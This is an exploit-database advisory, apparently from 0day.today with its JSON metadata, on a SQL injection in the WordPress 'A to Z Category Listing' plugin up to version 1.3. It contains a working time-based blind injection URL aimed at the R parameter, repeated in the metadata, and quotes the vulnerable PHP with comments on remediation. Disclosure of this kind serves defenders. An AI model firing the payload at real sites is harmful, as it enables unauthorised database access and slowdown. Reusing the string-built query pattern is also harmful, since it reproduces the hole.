ID 1337DAY-ID-16919
Type zdt
Reporter Miroslav Stampar
Modified 2011-09-08T00:00:00
Description
Exploit for php platform in category web applications
# Exploit Title: WordPress A to Z Category Listing plugin <= 1.3 SQL Injection Vulnerability
# Date: 2011-09-09
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/a-to-z-category-listing.zip
# Version: 1.3 (tested)
# Note: magic_quotes has to be turned off (when it is on, PHP backslash-escapes the single quote in R before it reaches the query)
---
PoC
---
http://www.site.com/wp-content/plugins/a-to-z-category-listing/post_retrive_ajax.php?R=-1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)--%20
---------------
Vulnerable code
---------------
// Excerpt shown by the advisory, presumably from the plugin file named in the
// PoC URL; the "..." line below stands for code the advisory does not show.
// The request parameter R is copied as-is: no type check, length limit or
// escaping is applied on this line.
$init_letter = $_GET['R'];
// The raw value is concatenated between single quotes inside the LIKE pattern,
// so a quote character in R ends the string literal and the rest of R is
// parsed as SQL (string-built query from untrusted input: SQL injection).
// Remediation: bind the value instead of concatenating it, e.g. build the
// pattern as $wpdb->esc_like($init_letter) . '%' and pass it through
// $wpdb->prepare() with a %s placeholder. The variable name suggests a single
// initial letter is expected, so rejecting anything else first is a reasonable
// extra check (confirm against the plugin's UI).
// PHP's magic_quotes setting (removed in PHP 5.4) is not a substitute for
// binding the value.
$sql = "select * from ".$table_prefix."terms wpt,".$table_prefix."term_taxonomy wptt where wpt.name like '".$init_letter."%' and wptt.taxonomy = 'category' and wpt.term_id = wptt.term_id";
...
// The concatenated string is executed unchanged; unless the elided lines
// sanitize $init_letter (the advisory indicates they do not), attacker-supplied
// SQL reaches the database here.
$sql_rec = $wpdb->get_results($sql);
# 0day.today [2018-04-14] #
{"id": "1337DAY-ID-16919", "bulletinFamily": "exploit", "title": "WordPress A to Z Category Listing plugin <= 1.3 SQL Injection", "description": "Exploit for php platform in category web applications", "published": "2011-09-08T00:00:00", "modified": "2011-09-08T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://0day.today/exploit/description/16919", "reporter": "Miroslav Stampar", "references": [], "cvelist": [], "type": "zdt", "lastseen": "2018-04-14T11:44:21", "history": [{"bulletin": {"bulletinFamily": "exploit", "cvelist": [], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "Exploit for php platform in category web applications", "edition": 1, "enchantments": {"score": {"modified": "2016-04-20T01:46:15", "value": 6.3, "vector": "AV:N/AC:M/Au:S/C:N/I:N/A:C/"}}, "hash": "ed98abd6a850a427723592a758f3f3c82bb30edc9427ea8e0b6d74f20e8792a8", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "1e6fbe986dc5c0708652c8e5c9a4d4d0", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "0077e9e7d0a154acd4322336686d1ec7", "key": "published"}, {"hash": "0077e9e7d0a154acd4322336686d1ec7", "key": "modified"}, {"hash": "0f09ce50f703215a5b3963638aa69b7d", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "0c7f0eb9b7efd9b3f22c22e3c15c56b4", "key": "href"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "ff5e96c63a0ee85c5a6d8b62c3dbc558", "key": "sourceHref"}, {"hash": "c98d63cb2538e086d8cffc243aeae0cc", "key": "sourceData"}, {"hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc", "key": "description"}], "history": [], "href": "http://0day.today/exploit/description/16919", "id": "1337DAY-ID-16919", "lastseen": "2016-04-20T01:46:15", "modified": "2011-09-08T00:00:00", "objectVersion": "1.0", "published": "2011-09-08T00:00:00", "references": [], "reporter": 
"Miroslav Stampar", "sourceData": "# Exploit Title: WordPress A to Z Category Listing plugin <= 1.3 SQL Injection Vulnerability\r\n# Date: 2011-09-09\r\n# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)\r\n# Software Link: http://downloads.wordpress.org/plugin/a-to-z-category-listing.zip\r\n# Version: 1.3 (tested)\r\n# Note: magic_quotes has to be turned off\r\n \r\n---\r\nPoC\r\n---\r\nhttp://www.site.com/wp-content/plugins/a-to-z-category-listing/post_retrive_ajax.php?R=-1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)--%20\r\n \r\n---------------\r\nVulnerable code\r\n---------------\r\n$init_letter = $_GET['R'];\r\n$sql = \"select * from \".$table_prefix.\"terms wpt,\".$table_prefix.\"term_taxonomy wptt where wpt.name like '\".$init_letter.\"%' and wptt.taxonomy = 'category' and wpt.term_id = wptt.term_id\";\r\n...\r\n$sql_rec = $wpdb->get_results($sql);\r\n\r\n\n\n# 0day.today [2016-04-20] #", "sourceHref": "http://0day.today/exploit/16919", "title": "WordPress A to Z Category Listing plugin <= 1.3 SQL Injection", "type": "zdt", "viewCount": 0}, "differentElements": ["sourceHref", "sourceData", "href"], "edition": 1, "lastseen": "2016-04-20T01:46:15"}], "edition": 2, "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "8cd4821cb504d25572038ed182587d85"}, {"key": "description", "hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc"}, {"key": "href", "hash": "4270004b71c2eaf732e4c127961b5513"}, {"key": "modified", "hash": "0077e9e7d0a154acd4322336686d1ec7"}, {"key": "published", "hash": "0077e9e7d0a154acd4322336686d1ec7"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "0f09ce50f703215a5b3963638aa69b7d"}, {"key": "sourceData", "hash": "18b557eb3ab296ac02a8116ae25482cf"}, {"key": "sourceHref", "hash": "9c0750e2f9c2b2acb76eeaec2ea6732e"}, {"key": "title", "hash": 
"1e6fbe986dc5c0708652c8e5c9a4d4d0"}, {"key": "type", "hash": "0678144464852bba10aa2eddf3783f0a"}], "hash": "ba65aa3193388807573ea3ab4931706ef4aca61187cff05d7725bef9cf722b90", "viewCount": 0, "enchantments": {"vulnersScore": 6.3}, "objectVersion": "1.3", "sourceHref": "https://0day.today/exploit/16919", "sourceData": "# Exploit Title: WordPress A to Z Category Listing plugin <= 1.3 SQL Injection Vulnerability\r\n# Date: 2011-09-09\r\n# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)\r\n# Software Link: http://downloads.wordpress.org/plugin/a-to-z-category-listing.zip\r\n# Version: 1.3 (tested)\r\n# Note: magic_quotes has to be turned off\r\n \r\n---\r\nPoC\r\n---\r\nhttp://www.site.com/wp-content/plugins/a-to-z-category-listing/post_retrive_ajax.php?R=-1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)--%20\r\n \r\n---------------\r\nVulnerable code\r\n---------------\r\n$init_letter = $_GET['R'];\r\n$sql = \"select * from \".$table_prefix.\"terms wpt,\".$table_prefix.\"term_taxonomy wptt where wpt.name like '\".$init_letter.\"%' and wptt.taxonomy = 'category' and wpt.term_id = wptt.term_id\";\r\n...\r\n$sql_rec = $wpdb->get_results($sql);\r\n\r\n\n\n# 0day.today [2018-04-14] #"}